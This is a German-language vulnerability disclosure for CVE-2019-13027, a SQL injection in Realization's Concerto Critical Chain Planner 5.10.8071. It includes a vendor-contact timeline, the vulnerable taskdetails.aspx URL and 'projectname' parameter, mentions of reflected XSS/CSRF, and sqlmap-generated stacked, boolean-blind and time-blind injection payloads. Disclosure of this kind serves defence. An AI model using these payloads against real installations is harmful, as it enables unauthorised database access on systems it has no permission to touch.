
Details zur Offenlegung von CVE-2019-13027
Details zur Offenlegung von CVE-2019-13027
Zeitplan des Kontakts mit dem Anbieter:
Juli 2019 -> Keine Antwort, keine E-Mail.
Juli 2019 -> Keine Antwort, keine E-Mail.
Juli 2019 -> E-Mail gesendet, GitHub erstellt.
Juli 2019 -> Keine Antwort des Anbieters. Schwachstelle offengelegt.
[Verwundbarkeitstyp] SQL Injection [Betroffene Produktcodebasis] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Version: 5.10.8071 (Andere Versionen im 5.x-Zweig sind wahrscheinlich betroffen. Kann nicht mit >anderen Zweigen getestet werden)
[Betroffene Komponente] Realization Concerto Critical Chain Planner (auch bekannt als CCPM) 5.10.8071 weist einige kritische Sicherheitsprobleme auf, darunter SQL-Injection mindestens in der Webseite taskupdt/taskdetails.aspx über den Parameter "projectname"
[Angriffstyp] Remote
[Angriffsvektoren] Die Anwendung hat viele reflektierte XSS/CSRF (z. B. in checklist/checklist), aber der knifflige Teil sind die SQL-Injections. Je nach SQL Server-Version und/oder IDS/IPS ist etwas Manipulation erforderlich.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
ProjectName (foo) muss existieren und gültig sein. Fuzze die restlichen Parameter (oder verwende eine echte Anfrage). foo hat auch ein XSS
Erkanntes SQL (Payloads von SQLMAP) Parameter: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[Anbieter des Produkts] REALIZATION - https://www.realization.com/